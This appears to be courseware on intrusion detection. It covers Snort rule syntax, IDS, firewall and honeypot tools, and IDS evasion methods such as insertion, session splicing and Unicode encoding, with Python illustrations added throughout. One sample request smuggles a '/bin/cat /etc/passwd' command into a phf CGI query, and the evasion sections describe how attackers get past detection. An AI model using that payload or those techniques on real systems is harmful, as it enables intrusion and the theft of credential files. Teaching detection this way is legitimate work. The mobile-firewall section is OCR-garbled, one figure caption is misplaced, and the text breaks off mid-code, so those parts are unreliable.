The rule header stores a complete set of criteria to identify a packet and determines the action to be performed or rule to be applied. It contains information that defines the who, where, and what of a packet, as well as what to do if a packet with all the attributes indicated in the rule should show up. The first item in a rule is the rule action, which tells Snort "what to do" when it finds a packet that matches the rule criteria. There are five available default actions in Snort: alert, log, pass, activate, and dynamic. Furthermore, if Snort is running in inline mode, you have additional options, which include drop and reject.

IP sends data from one system to another via the Internet. It supports unique addressing for every computer on a network. Data on an IP network is organized into packets. Each packet contains message data, a source, a destination, and more.

Snort supports three IP protocols for tackling suspicious behavior:
- TCP: The Transmission Control Protocol (TCP) is part of the IP suite. It is used to connect two different hosts and exchange data between them.
- UDP: The User Datagram Protocol (UDP) is a connectionless datagram protocol, used, for example, for broadcasting messages over a network.
- ICMP: The Internet Control Message Protocol (ICMP) is part of the IP suite. The OS uses ICMP in a network to send error messages.
Snort Rules: Direction Operator and IP Addresses

Direction Operator
This operator indicates the direction of interest for the traffic; traffic can flow either in a single direction or bidirectionally.

Example of a Snort rule using the bidirectional operator:
log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23

IP Addresses
- Identify the IP address and port that the rule applies to
- Use the keyword "any" to define the IP address
- Use numeric IP addresses qualified with a CIDR netmask

Example of an IP address negation rule:
alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 111 (content: "|00 01 86 a5|"; msg: "external mountd access";)
Snort Rules: Port Numbers

Port numbers can be listed in different ways, including the use of "any" ports, static port definitions, port ranges, and negation. Port ranges are indicated by the range operator ":". The direction operator "->" indicates the orientation, or direction, of the traffic to which the rule applies. Consider the IP address and port number on the left side of the direction operator as the traffic coming from the source host and the address and port information on the right side of the operator as the destination host. There is also a bidirectional operator, indicated by "<>". This tells Snort to consider the address/port pairs in either the source or the destination orientation, and it is handy for recording/analyzing both sides of a conversation, such as telnet or POP3 sessions. Further, note that there is no "<-" operator. In Snort versions before version 1.8.7, the direction operator did not provide proper error checking; hence, many people used invalid tokens. "<-" does not exist so that rules always read consistently.

The next fields in a Snort rule specify the source and destination IP addresses and ports of the packet, as well as the direction in which the packet is traveling. Snort can accept a single IP address or a list of addresses. When specifying a list of IP addresses, you should separate each one with a comma and then enclose the list within square brackets, as follows:
[192.168.1.1,192.168.1.45,10.1.1.24]
When doing this, be careful not to use any whitespace. You can also specify ranges of IP addresses using CIDR notation or even include CIDR ranges within lists. Snort also allows you to apply the logical NOT operator ("!") to an IP address or CIDR range to specify that the rule should match all but that address or range of addresses. For example, an easy modification to the initial example is to change it, using the negation operator, such that an alert is raised upon detecting any traffic that has originated outside the local net.

Example of a port negation:
log tcp any any -> 192.168.1.0/24 !6000:6010

Action  Protocol  Addresses and ports                  Description
log     udp       any any -> 192.168.1.0/24 1:1024     Log UDP traffic coming from any port with destination ports ranging from 1 to 1024
log     tcp       any any -> 192.168.1.0/24 :5000      Log TCP traffic from any port going to ports less than or equal to 5000
log     tcp       any :1024 -> 192.168.1.0/24 400:     Log TCP traffic from the well-known ports (less than or equal to 1024) going to ports greater than or equal to 400

Table 12.2: Examples of Port Negation
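The header syntax described in the three sections above lends itself to a small parser. The Python below is an added example (it is not Snort's own code and does not reproduce its detection engine): it parses the rule header (action, protocol, source address and port, direction operator, destination address and port) with "any", CIDR blocks, "!" negation, bracketed address lists and ":" port ranges, reads the content and msg options, and evaluates the rules quoted in this section against constructed packets. The class and function names are chosen for the example.

```python
"""Parse the Snort rule header syntax (action, protocol, address, port,
direction operator; 'any', CIDR, '!' negation, bracketed lists and ':' port
ranges) plus the 'content' and 'msg' options, and evaluate rules against
packets. Added example, not Snort's own code: Snort's real parser and
detection engine do far more. The packets used below are constructed."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

HEADER_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*(?:\((.*)\))?\s*$")


@dataclass
class Packet:
    proto: str          # "tcp", "udp" or "icmp", as written in the rule header
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes = b""


def addr_matches(spec: str, ip: str) -> bool:
    """'any', a CIDR block, or a [list,of,specs]; a leading '!' negates."""
    negate = spec.startswith("!")
    spec = spec[1:] if negate else spec
    if spec == "any":
        hit = True
    elif spec.startswith("[") and spec.endswith("]"):
        hit = any(addr_matches(s, ip) for s in spec[1:-1].split(","))
    else:
        hit = ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)
    return (not hit) if negate else hit


def port_matches(spec: str, port: int) -> bool:
    """'any', a single port, or a range 'lo:hi' with either end open; '!' negates."""
    negate = spec.startswith("!")
    spec = spec[1:] if negate else spec
    if spec == "any":
        hit = True
    elif ":" in spec:
        lo, _, hi = spec.partition(":")
        hit = (lo == "" or int(lo) <= port) and (hi == "" or port <= int(hi))
    else:
        hit = int(spec) == port
    return (not hit) if negate else hit


def content_bytes(value: str) -> bytes:
    """Decode a content string such as 'ab|00 01 86 a5|cd' into raw bytes."""
    pieces = value.split("|")
    return b"".join(bytes.fromhex(p) if i % 2 else p.encode() for i, p in enumerate(pieces))


@dataclass
class Rule:
    action: str
    proto: str
    src: str
    sport: str
    direction: str
    dst: str
    dport: str
    content: Optional[bytes] = None
    msg: str = ""

    @classmethod
    def parse(cls, text: str) -> "Rule":
        m = HEADER_RE.match(text.strip())
        if m is None:
            raise ValueError(f"cannot parse rule: {text}")
        rule = cls(*m.groups()[:7])
        for option in (m.group(8) or "").split(";"):
            key, _, value = option.partition(":")
            key, value = key.strip(), value.strip().strip('"')
            if key == "content":
                rule.content = content_bytes(value)
            elif key == "msg":
                rule.msg = value
        return rule

    def _one_way(self, pkt: Packet, src: str, sport: str, dst: str, dport: str) -> bool:
        return (addr_matches(src, pkt.src) and port_matches(sport, pkt.sport)
                and addr_matches(dst, pkt.dst) and port_matches(dport, pkt.dport))

    def matches(self, pkt: Packet) -> bool:
        if self.proto != pkt.proto:
            return False
        hit = self._one_way(pkt, self.src, self.sport, self.dst, self.dport)
        if not hit and self.direction == "<>":      # try the conversation the other way round
            hit = self._one_way(pkt, self.dst, self.dport, self.src, self.sport)
        return hit and (self.content is None or self.content in pkt.payload)


def evaluate(rules: List[str], pkt: Packet) -> List[Tuple[int, str, str]]:
    """Return (rule index, action, msg) for every rule that fires on pkt."""
    parsed = [Rule.parse(r) for r in rules]
    return [(i, r.action, r.msg) for i, r in enumerate(parsed) if r.matches(pkt)]


RULES = [
    'alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 111 (content: "|00 01 86 a5|"; msg: "external mountd access";)',
    'log tcp any any -> 192.168.1.0/24 !6000:6010',
    'log udp any any -> 192.168.1.0/24 1:1024',
    'log tcp any :1024 -> 192.168.1.0/24 400:',
    'log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23',
]

if __name__ == "__main__":
    mountd = Packet("tcp", "10.9.8.7", 40211, "192.168.1.5", 111, b"\x00\x01\x86\xa5...")
    print(evaluate(RULES, mountd))   # rule 0 alerts; rule 1 logs (111 lies outside !6000:6010)
```

evaluate() returns the index, action, and message of every rule that fires. With the constructed mountd packet, rule 0 alerts and rule 1 also logs, because port 111 lies outside the negated range 6000:6010; a telnet packet travelling from the inside to the outside is caught by rule 4 only because of the bidirectional operator, and the same packet with a payload that lacks the |00 01 86 a5| bytes no longer triggers rule 0.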
Suricata
Source: https://suricata-ids.org
Suricata is a robust network threat detection engine capable of real-time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM), and offline pcap processing. It inspects the network traffic using powerful and extensive rules and a signature language, and it provides powerful Lua scripting support for the detection of complex threats. With standard input and output formats such as YAML and JSON, integrations with existing tools such as SIEMs, Splunk, Logstash/Elasticsearch, Kibana, and other databases become effortless.

Figure 12.21: Screenshot of TippingPoint

AlienVault OSSIM
Source: https://www.alienvault.com
AlienVault OSSIM, Open Source Security Information and Event Management (SIEM), provides you with a feature-rich open-source SIEM complete with event collection, normalization, and correlation. OSSIM provides a unified platform with many essential security capabilities such as:
- Asset discovery
- Vulnerability assessment
- Intrusion detection
- Behavioral monitoring
- SIEM event correlation

Some additional intrusion detection tools are listed below:
- SolarWinds Security Event Manager (https://www.solarwinds.com)
- OSSEC (https://www.ossec.net)
- BroIDS/Zeek IDS (https://www.zeek.org)
Intrusion Detection Tools for Mobile Devices

Intrusion detection tools are also available for mobile devices to help you detect and prevent intrusion attempts.

zIPS
Source: https://www.zimperium.com
Zimperium's zIPS is a mobile intrusion prevention system app that provides comprehensive protection for iOS and Android devices against mobile network, device, and application cyber-attacks. It can detect both known and unknown threats by analyzing the behavior of your mobile device. By examining slight deviations in the mobile device's OS statistics, memory, CPU, and other system parameters, the z9 detection engine can accurately identify not only the specific type of malicious attack but also the forensics associated with the who, what, where, when, and how of an attack occurrence.

Figure 12.23: Screenshot of zIPS

Wifi Inspector
Source: https://play.google.com
Wifi Inspector allows you to find all the devices connected to the network (via both wired and Wi-Fi connections, including consoles, TVs, PCs, tablets, and phones); it gives relevant data such as the IP addresses, manufacturer names, device names, and MAC addresses of connected devices. It also allows you to save a list of known devices with a custom name and finds intruders in a short period.

Figure 12.24: Screenshot of Wifi Inspector

Wifi Intruder Detect
Source: https://wifi-intruder-detect.en.aptoide.com
Wifi Intruder Detect helps to find security leaks in the Wi-Fi network Internet connection. It allows you to detect an intruder who is accessing the network, Wi-Fi, or Internet connection without your consent.

Figure 12.25: Screenshot of Wifi Intruder Detector Pro
Intrusion Prevention Tools

AlienVault Unified Security Management (USM)
Source: https://www.alienvault.com
AlienVault USM can perform threat detection, incident response, and compliance management across cloud, on-premises, and hybrid environments. It can be integrated with AlienVault Open Threat Exchange (OTX), which is an open threat intelligence community with more than 100,000 participants who contribute over 19 million threat indicators daily to protect the network from intrusions.

Figure 12.26: Screenshot of AlienVault USM

Some additional intrusion prevention tools are listed below:
- IBM Security Network Intrusion Prevention System (https://www.ibm.com)
- Cyberoam Intrusion Prevention System (https://www.cyberoam.com)
- McAfee Host Intrusion Prevention for Desktops (https://www.mcafee.com)
- Cisco Intrusion Prevention Systems (https://www.cisco.com)
- Check Point IPS Software Blade (https://www.checkpoint.com)
Firewalls: ZoneAlarm Free Firewall 2019 and ManageEngine Firewall Analyzer

Firewalls

Firewalls provide essential protection to computers against viruses, privacy threats, objectionable content, hackers, and malicious software when connected to the Internet. A firewall monitors running applications that access the network. It analyzes downloads, raises an alert when a malicious file is being downloaded, and stops it from infecting the PC.

ZoneAlarm Free Firewall 2019
Source: https://www.zonealarm.com
ZoneAlarm Free Firewall 2019 prevents attackers and intruders from accessing your system. It manages and monitors all incoming and outgoing traffic and shields the network from hackers, malware, and other online threats that may compromise network privacy. It monitors programs for suspicious behavior, spotting and stopping new attacks that bypass traditional anti-virus protection. Moreover, it prevents identity theft by guarding your data. It also erases your tracks, allowing you to surf the web in complete privacy. Furthermore, it locks out attackers, blocks intrusions, and makes your PC invisible online. In addition, it filters out annoying and potentially dangerous emails.

Features:
- Two-way firewall that monitors and blocks inbound as well as outbound traffic
- Allows users to browse the web privately using the Full Stealth Mode
- Identity protection services help to prevent identity theft by guarding the users' crucial data; it also offers PC protection and data encryption
- Public network protection and wireless network protection are other key features of this firewall
- Provides quick real-time security updates

Figure 12.27: Screenshot of ZoneAlarm PRO 2017 Firewall

ManageEngine Firewall Analyzer
Source: https://www.manageengine.com
ManageEngine Firewall Analyzer is an agent-less log analytics and configuration management software that helps network administrators to understand how the bandwidth is being used in their network. ManageEngine Firewall Analyzer is vendor-agnostic and supports nearly all open-source and commercial network firewalls such as Check Point, Cisco, Fortinet, Juniper, and Palo Alto.

Features:
- Compliance and Change Management
- User Internet Activity Monitoring
- Network Traffic and Bandwidth Monitoring
- Firewall Policy Management
- Real-time VPN and Proxy Server Monitoring
- Network Security Management
- Network Forensic Audits
- Log Analysis

Figure 12.28: Screenshot of ManageEngine Firewall Analyzer (firewall traffic statistics per device, e.g., Cisco PIX and Palo Alto)

Some additional firewall solutions are listed below:
- pfSense (https://www.pfsense.org)
- Sophos XG Firewall (https://www.sophos.com)
- Comodo Firewall (https://personalfirewall.comodo.com)
- Palo Alto Networks WildFire (https://www.paloaltonetworks.com)
Firewallsfor Mobile Devices

|
Firewalls forMobile Devices
previously
Thefirewallsdiscussed are usedfor securing personal and networks.
computers
Similarly,
=
some
firewalls can secure mobile
Mobiwol:NoRootFirewall
devices.

Source:http://www.mobiwol.com
MobiwolNoRootFirewallhelps allow/block
to take controlof mobileapps, easily app
andblockbackground
connectivity, alertswhen new apps
app activity.It generates
access the Internet.
Features:
Automaticlaunches
on device
startup
Automaticallyidentifies
applications
currentlyinstalledon your mobiledevice
Identifiesandnotifieswhennewly
installedappsaccesstheweb
Setsallow/blockon a per-application
basis
background
Disables activityfor selectedapps

Module2 1519
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
12.28:ScreenshotofMebiwol:
Figure NoRootFrewal

Mobile Privacy Shield
Source: https://shieldapps.com
Mobile Privacy Shield is an application for people on the move, i.e., people who store sensitive information on their smartphones and use their devices for banking, shopping, business, and more. Mobile Privacy Shield's Privacy Advisor monitors application permissions, sorting them into three categories by privacy-risk level. Each report is packed with detailed information, and a response is suggested per case. Mobile Privacy Shield centralizes all permissions, allowing you to review and assess their validity and need conveniently. It also allows you to remove each threat from within the interface.

Figure 12.30: Screenshot of Mobile Privacy Shield

NetPatch Firewall
Source: https://firewall.netpatch.co
NetPatch Firewall is a full-featured, advanced Android no-root firewall. It can be used to fully control a mobile device's network. Using NetPatch Firewall, you can create network rules based on apps, IP addresses, domain names, etc. This firewall is designed to reduce a mobile device's network traffic and battery consumption, improve network security, and ensure privacy.
Features:
- Block network access per app, screen on/off, Wi-Fi/mobile (3G and 4G), and block roaming
- Shadowsocks proxy support (a TCP and UDP proxy that works better than a VPN)
- Custom DNS: change your DNS server, send DNS queries through the Shadowsocks proxy, and set the DNS cache time
- Notify when new apps are installed
- Export/import configuration

Figure 12.31: Screenshot of NetPatch Firewall

Honeypot Tools: KFSensor and SPECTER

Honeypots are security tools that allow the security community to monitor attackers' tricks and exploits by logging all their activity, so that it can respond quickly to such exploits before the attacker can misuse or compromise the system.

KFSensor
Source: http://www.keyfocus.net
KFSensor is a host-based IDS that acts as a honeypot to attract and detect hackers and worms by simulating vulnerable system services and Trojans. By acting as a decoy server, it can divert attacks from critical systems and provide a higher level of information than that achieved using firewalls and NIDS alone. You can use KFSensor in a Windows-based corporate environment. It includes many innovative and unique features such as remote management, a Snort-compatible signature engine, and emulations of Windows networking protocols.

Figure 12.32: Screenshot of KFSensor

SPECTER
Source: http://www.specter.com
SPECTER is a honeypot or deception system. It simulates a complete system and provides an appealing target to lure hackers away from production systems. It offers typical Internet services such as SMTP, FTP, POP3, HTTP, and TELNET, which appear perfectly normal to attackers. However, it traps attackers by tricking them into leaving traces that show that they had connected to a decoy system that does none of the things it appears to do but instead logs everything and notifies the appropriate people. Furthermore, SPECTER automatically investigates attackers while they are still trying to break in. It provides massive amounts of decoy content and generates decoy programs that do not leave traces on the attacker's computer. Automated weekly online updates of the honeypot's content and vulnerability databases allow the honeypot to change regularly without user interaction.

Figure 12.33: Screenshot of SPECTER

Some additional honeypot tools are listed below:
- HoneyBOT (https://www.atomicsoftwaresolutions.com)
- MongoDB-HoneyProxy (https://github.com)
- Modern Honey Network (https://github.com)
- Honeyd (http://www.honeyd.org)

Module Flow

Evading IDS

The previous sections helped us to understand IDS, IPS, their roles and functions, how they protect your network from intruders, and the various IDS solutions available. Even though IDS thwart attempts to breach the network security, attackers can still evade IDS. This section explains various ways in which attackers evade IDS.

IDS Evasion Techniques

IDS that provide an extra layer of security to the organization's infrastructure are interesting targets for attackers. Attackers implement various IDS evasion techniques to bypass such security mechanisms and compromise the infrastructure. IDS evasion is the process of modifying attacks to fool the IDS/IPS into interpreting the traffic as legitimate and thus prevent the IDS from triggering an alert. Many IDS evasion techniques can perform IDS evasion in different and effective ways.

Some IDS evasion techniques are as follows:
- Insertion Attack
- Evasion
- Denial-of-Service Attack
- Obfuscating
- False Positive Generation
- Session Splicing
- Unicode Evasion
- Fragmentation Attack
- Overlapping Fragments
- Time-To-Live Attacks
- Invalid RST Packets
- Urgency Flag
- Polymorphic Shellcode
- ASCII Shellcode
- Application-Layer Attacks
- Desynchronization
- Encryption
- Flooding

Insertion Attack
Insertion is the process by which the attacker confuses the IDS by forcing it to read invalid packets (i.e., packets that the end system addressed will not accept). An IDS blindly trusts and accepts a packet that an end system rejects. If a packet is malformed or if it does not reach its actual destination, the packet is invalid. If the IDS reads an invalid packet, it gets confused. An attacker exploits this condition and inserts data into the IDS. This attack occurs when the NIDS is less strict in processing packets than the internal network. The attacker obscures the extra traffic, and the IDS concludes that the traffic is harmless. Hence, the IDS gets more packets than the destination.

To understand how insertion becomes a problem for a network IDS, it is important to understand how the IDS detects attacks. It employs pattern-matching algorithms to look for specific patterns of data in a packet or stream of packets. For example, it might search for the "phf" string in an HTTP request to discover a PHF Common Gateway Interface (CGI) attack. An attacker who can insert packets into the IDS can prevent pattern matching from working. For instance, an attacker can send the string "phf" to a web server, attempting to exploit the CGI vulnerability, but force the IDS to read "phoneyf" (by "inserting" the string "oney") instead. A straightforward insertion attack involves intentionally corrupting the IP checksum. Every packet transmitted on an IP network has a checksum that lets the receiver detect corrupted packets. IP checksums are 16-bit numbers computed by examining the information in the packet. If the checksum on an IP packet does not match the actual packet, the addressed host will not accept it, while the IDS might consider it as part of the effective stream.

For example, the attacker can send packets whose time-to-live (TTL) fields are crafted to reach the IDS but not the target computers. This will result in the IDS and the target system having two different character strings. An attacker confronts the IDS with a stream of one-character packets (the attacker-originated data stream), in which one of the characters (the letter "X") will be accepted only by the IDS. As a result, the IDS and the end system reconstruct two different strings.

Figure 12.34: Evading IDS using insertion attack
Evasion

An "evasion" attack occurs when the IDS discards packets while the host that has to get the packets accepts them. Using this technique, an attacker exploits the host computer. Evasion attacks have an adverse effect on the accuracy of the IDS. An evasion attack at the IP layer allows an attacker to attempt arbitrary attacks against hosts on a network without the IDS ever realizing it. The attacker sends portions of the request in packets that the IDS mistakenly rejects, allowing the removal of parts of the stream from the ID system's view. For example, if the attacker sends a malicious sequence byte by byte, and the IDS rejects only one byte, it cannot detect the attack. Here, the IDS gets fewer packets than the destination.

One example of an evasion attack is when an attacker opens a TCP connection with a data packet. Before any TCP connection can be used, it must be "opened" with a handshake between the two endpoints of the connection. An essential fact about TCP is that the handshake packets can themselves bear data. An IDS that does not accept the data in these packets is vulnerable to an evasion attack.

Figure 12.35: Illustration of evasion technique

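The following Python model is an added example, not code from the CEH courseware or from any vendor: it replays the insertion scenario (the "phoneyf" string the IDS reads while the host reads "phf") and the evasion scenario of this section (data carried in the handshake segment) using one toy packet format. The only two policies modelled are the ones the text describes: the IDS never verifies the IP checksum but refuses data in a handshake segment, while the host verifies the checksum and keeps handshake data. The packet layout, the single-character packets and the policy functions are assumptions made for illustration.

```python
"""Why an IDS and an end host can reconstruct different strings from one packet stream.

Added illustration, not part of the CEH courseware. The packet format and the
accept/reject policies below are simplifications chosen for the demonstration.
"""
import struct

SIGNATURE = b"phf"   # the CGI attack string the IDS pattern-matches on


def ip_checksum(data: bytes) -> int:
    """RFC 1071 16-bit one's-complement checksum, as used by IPv4 headers."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def packet(data: bytes, *, corrupt_checksum=False, in_handshake=False) -> dict:
    """Toy packet: payload, a checksum over it, and whether the bytes ride in a SYN."""
    csum = ip_checksum(data)
    if corrupt_checksum:
        csum ^= 0xFFFF          # deliberately wrong, so a strict receiver rejects it
    return {"data": data, "csum": csum, "in_handshake": in_handshake}


def ids_accepts(pkt: dict) -> bool:
    """Sloppy NIDS (assumption): never verifies checksums (insertion hole) but
    does not believe that data can arrive in a handshake segment (evasion hole)."""
    return not pkt["in_handshake"]


def host_accepts(pkt: dict) -> bool:
    """End host: verifies the checksum; keeps data carried in the SYN."""
    return pkt["csum"] == ip_checksum(pkt["data"])


def reconstruct(packets, accepts) -> bytes:
    """Concatenate the payloads that a given vantage point accepts, in order."""
    return b"".join(p["data"] for p in packets if accepts(p))


def alerts(stream: bytes) -> bool:
    return SIGNATURE in stream


def insertion_scenario():
    """Insertion: 'oney' travels in packets only the IDS accepts, so the IDS
    sees 'phoneyf' while the host sees 'phf'. Returns (ids_view, host_view)."""
    pkts = [packet(b"p"), packet(b"h")]
    pkts += [packet(c, corrupt_checksum=True) for c in (b"o", b"n", b"e", b"y")]
    pkts.append(packet(b"f"))
    return reconstruct(pkts, ids_accepts), reconstruct(pkts, host_accepts)


def evasion_scenario():
    """Evasion: the first byte rides in the SYN; the IDS drops it, the host keeps it."""
    pkts = [packet(b"p", in_handshake=True), packet(b"h"), packet(b"f")]
    return reconstruct(pkts, ids_accepts), reconstruct(pkts, host_accepts)


if __name__ == "__main__":
    for name, scenario in (("insertion", insertion_scenario), ("evasion", evasion_scenario)):
        ids_view, host_view = scenario()
        print(f"{name}: IDS sees {ids_view!r} (alert={alerts(ids_view)}), "
              f"host sees {host_view!r} (alert={alerts(host_view)})")
```

In both runs the host ends up with "phf" and no alert fires: once because the IDS saw too much, once because it saw too little. The practical fix on the IDS side is the same in both cases: apply the end host's acceptance rules (verify checksums, model handshake data the way the target stack does) before feeding bytes to the pattern matcher.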
Denial-of-Service Attack (DoS)
Multiple types of DoS attack will work against IDS. The attacker identifies a point of network processing that requires the allocation of a resource, causing a condition to occur in which all of that resource is consumed. The resources affected by the attacker are CPU cycles, memory, disk space, and network bandwidth. Attackers monitor and attack the CPU capabilities of the IDS. This is because the IDS needs CPU cycles to read the packets, determine what they are for, and then compare them with some location in the saved network state. An attacker can identify the most computationally expensive network processing operations and then compel the IDS to spend all its time carrying out useless work.

An IDS requires memory for a variety of tasks such as generating a match for the patterns, saving the TCP connections, maintaining reassembly queues, and producing buffers for the data. In the initial phase, the system requires memory to read the packets. The system will allocate the memory for network processing operations. An attacker can identify the processing operations that require the IDS to allocate memory and force the IDS to assign all of its memory to meaningless information.

In certain circumstances, the IDS stores activity logs on the disk. The stored events occupy most of the disk space. Most computers have limited disk space. The attackers can occupy a significant part of the disk space on the IDS by creating and storing a large number of useless events. This renders the IDS useless in terms of storing real events.

Network IDS record the activity on the networks they monitor. They are competent because networks are rarely used to their full capacity; few monitoring systems can cope with an extremely busy network.

The IDS, unlike an end system, must read everyone's packets, not just those explicitly sent to it. An attacker can overload the network with meaningless information and prevent the IDS from keeping up with what is happening on the network.

Many IDS today employ central logging servers that are used exclusively to store IDS alert logs. The central server's function is to centralize alert data so that it is viewed as a whole rather than on a system-by-system basis.

However, if attackers know the central log server's IP address, they could slow it down or even crash it using a DoS attack. After shutting down the server, attacks could go unnoticed because the alert data is no longer logged.

Using this evasion technique, an attacker:
- Causes the device to lock up
- Causes personnel to be unable to investigate all the alarms
- Causes more alarms than can be handled by management systems (such as databases)
- Fills up disk space, preventing attacks from being logged
- Consumes the device's processing power and allows attacks to sneak by

Obfuscating
Obfuscation means to make code more difficult to understand or read, generally for privacy or security purposes. A tool called an obfuscator converts a straightforward program into one that works in the same way but which is much more difficult to understand. Obfuscating is an IDS evasion technique used by attackers to encode the attack packet payload in such a way that the destination host can decode the packet but the IDS cannot. An attacker manipulates the path referenced in the signature to fool the HIDS. Using Unicode characters, an attacker can encode attack packets that the IDS would not recognize but which an IIS web server can decode. Polymorphic code is another means to circumvent signature-based IDS by creating unique attack patterns so that the attack does not have a single detectable signature. Attackers perform obfuscated attacks on encrypted protocols such as HTTPS. Attackers can also use obfuscation techniques such as digital steganography to bypass IDS and deploy malware on the target system lying beyond the IDS.

False Positive Generation
This mode does not attack the target; instead, it does something relatively ordinary. In this mode, the IDS generates an alarm when no condition is present to warrant one. Another attack similar to the DoS method is to create a significant amount of alert data that the IDS will log. Attackers construct malicious packets known to trigger alerts within the IDS, forcing it to generate a large number of false reports. Such an attack creates a large amount of log "noise" in an attempt to blend real attacks with fake ones. Attackers know all too well that when looking at log data, it can be challenging to differentiate between legitimate attacks and false positives. If attackers know the IDS, they can even generate false positives specific to that IDS. Attackers then use these false positive alerts to hide real attack traffic. Attackers can bypass the IDS unnoticed, as it is difficult to differentiate the attack traffic from the large volume of false positives.

Session Splicing
Session splicing is an IDS evasion technique that exploits how some IDS do not reconstruct sessions before pattern-matching the data. It is a network-level evasion method used to bypass IDS where an attacker splits the attack traffic into an excessive number of packets such that no single packet triggers the IDS. The attacker divides the data in the packets into small portions of a few bytes and evades the string match while delivering the data. The IDS cannot handle an excessive number of small-sized packets and fails to detect the attack signatures. If attackers know what IDS is in use, they could add delays between packets to bypass reassembly checking. This approach is effective against IDS that do not reconstruct packets before checking them against intrusion signatures. If attackers are aware of the delay in packet reassembly at the IDS, they can add delays between packet transmissions to bypass the reassembly. Many IDS reassemble communication streams; hence, if a packet is not received within a reasonable period, many IDS stop reassembling and handling that stream. If the application under attack keeps a session active for longer than the IDS spends on reassembling it, the IDS will stop. As a result, any session after the IDS stops reassembling the sessions will be susceptible to malicious data theft by attackers. The IDS will not log any attack attempt after a successful splicing attack. Attackers can use tools such as Nessus for session-splicing attacks.

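The Python below is an added example, not code from the courseware or from any IDS product. It sends the same PHF request three ways (one segment, one byte per segment, one byte per segment with long pauses) through two matchers: a stateless per-packet matcher and a stream reassembler with an inactivity timeout, which is the behaviour the delay trick above exploits. The request string, segment sizes, delays and timeout values are constructed for illustration.

```python
"""Session splicing: per-packet matching versus stream reassembly with a timeout.

Added illustration, not part of the CEH courseware. Segment sizes, inter-packet
delays and the timeout values are assumptions chosen to show the effect.
"""
SIGNATURE = b"/cgi-bin/phf"
# Constructed sample request (the classic phf probe), not captured traffic.
REQUEST = b"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0\r\n\r\n"


def splice(data: bytes, chunk: int, gap: float):
    """Split `data` into `chunk`-byte segments sent `gap` seconds apart.
    Returns (send_time, stream_offset, payload) tuples in sending order."""
    return [(i // chunk * gap, i, data[i:i + chunk]) for i in range(0, len(data), chunk)]


def packet_matcher(segments) -> bool:
    """Stateless inspection: looks for the signature inside each segment alone."""
    return any(SIGNATURE in payload for _, _, payload in segments)


class StreamMatcher:
    """Reassembles in-order segments into one buffer and matches on the stream.
    If no segment arrives within `timeout` seconds the partial stream is
    discarded, which is what an attacker who knows the timeout relies on."""

    def __init__(self, timeout: float):
        self.timeout = timeout
        self.buffer = b""
        self.last_seen = None
        self.resets = 0

    def feed(self, t: float, offset: int, payload: bytes) -> bool:
        if self.last_seen is not None and t - self.last_seen > self.timeout:
            self.buffer, self.resets = b"", self.resets + 1
        self.last_seen = t
        self.buffer += payload
        return SIGNATURE in self.buffer

    def scan(self, segments) -> bool:
        return any(self.feed(t, off, p) for t, off, p in segments)


def run(chunk: int, gap: float, ids_timeout: float) -> dict:
    """One delivery pattern seen by three observers. The host keeps its socket
    open indefinitely (assumption), so it always reassembles the full request."""
    segs = splice(REQUEST, chunk, gap)
    return {
        "per_packet": packet_matcher(segs),
        "stream_ids": StreamMatcher(ids_timeout).scan(segs),
        "stream_host": StreamMatcher(float("inf")).scan(segs),
    }


if __name__ == "__main__":
    print("one segment       :", run(len(REQUEST), 0.0, 30.0))
    print("1-byte, 0.1 s gap :", run(1, 0.1, 30.0))
    print("1-byte, 45 s gap  :", run(1, 45.0, 30.0))
```

The second run shows why per-packet matching is not enough; the third shows that stream reassembly is only as good as its timeout relative to the target application's own session lifetime, which is the gap the text describes.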
Unicode Evasion Technique
Unicode is a character coding system that supports encoding, processing, and displaying of written texts for universal languages to maintain consistency in a computer representation. Several standards, such as Java, LDAP, and XML, require Unicode, and many OS and applications support it. Attackers can implement an attack by using different character encodings of the "code points" in the Unicode code space. The most commonly used character encodings are Unicode Transformation Format (UTF)-8 and UTF-16.

For example: in the %u-escaped form of UTF-16, the character "/" can be represented as "%u2215" (U+2215 is the Unicode division slash, which some web servers have treated as "/") and "é" as "%u00e9"; in UTF-8, "©" can be represented as "%c2%a9" and "≠" as "%e2%89%a0".

Problems with Unicode:
In the Unicode code space, all the code points are treated differently, but it is possible that there are multiple representations of a single character. There are also code points that alter the previous code points. Moreover, applications or OS may assign the same representation to different code points. Because of this complexity, some IDS mishandle Unicode, as Unicode allows multiple interpretations of the same characters. For example, "\" can be represented as 5C, C19C, and E0819C (the latter two are overlong UTF-8 forms), which makes writing pattern-matching signatures very difficult. Taking advantage of this fact, attackers can convert attack strings into Unicode characters to avoid pattern and signature matching in the IDS. Attackers can also encode URLs in HTTP requests using Unicode characters to bypass HTTP-based attack detection at the IDS.

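The Python below is an added example, not code from the courseware or from any web server or IDS. It serves both the obfuscation section (encoded payloads the server decodes but a byte-matching IDS does not) and the Unicode section above: it decodes %XX and IIS-style %uXXXX escapes, deliberately accepts overlong UTF-8 such as C1 9C for "\", folds the division slash to "/", and only then matches signatures. The two signatures, the look-alike table and the sample request paths are constructed for illustration; real decoders have more quirks than the two modelled here.

```python
"""Match signatures against the decoded request, not the raw bytes.

Added illustration, not part of the CEH courseware. The lenient decoder below
deliberately reproduces bugs (overlong UTF-8, %u escapes) so that the IDS sees
what a lenient server would see; the signatures and samples are constructed.
"""
import re
import unicodedata

TRAVERSAL = re.compile(r"\.\.[\\/]")            # "../" or "..\"
SIGNATURES = {"phf": re.compile("phf"), "traversal": TRAVERSAL}

# Look-alike separators that some servers (historically IIS) accepted as "/" or "\".
FOLD = {"\u2215": "/", "\uff0f": "/", "\uff3c": "\\"}


def percent_decode(s: str) -> bytes:
    """Decode %XX and %uXXXX escapes into raw bytes (the %u form is UTF-8 encoded)."""
    out, i = bytearray(), 0
    while i < len(s):
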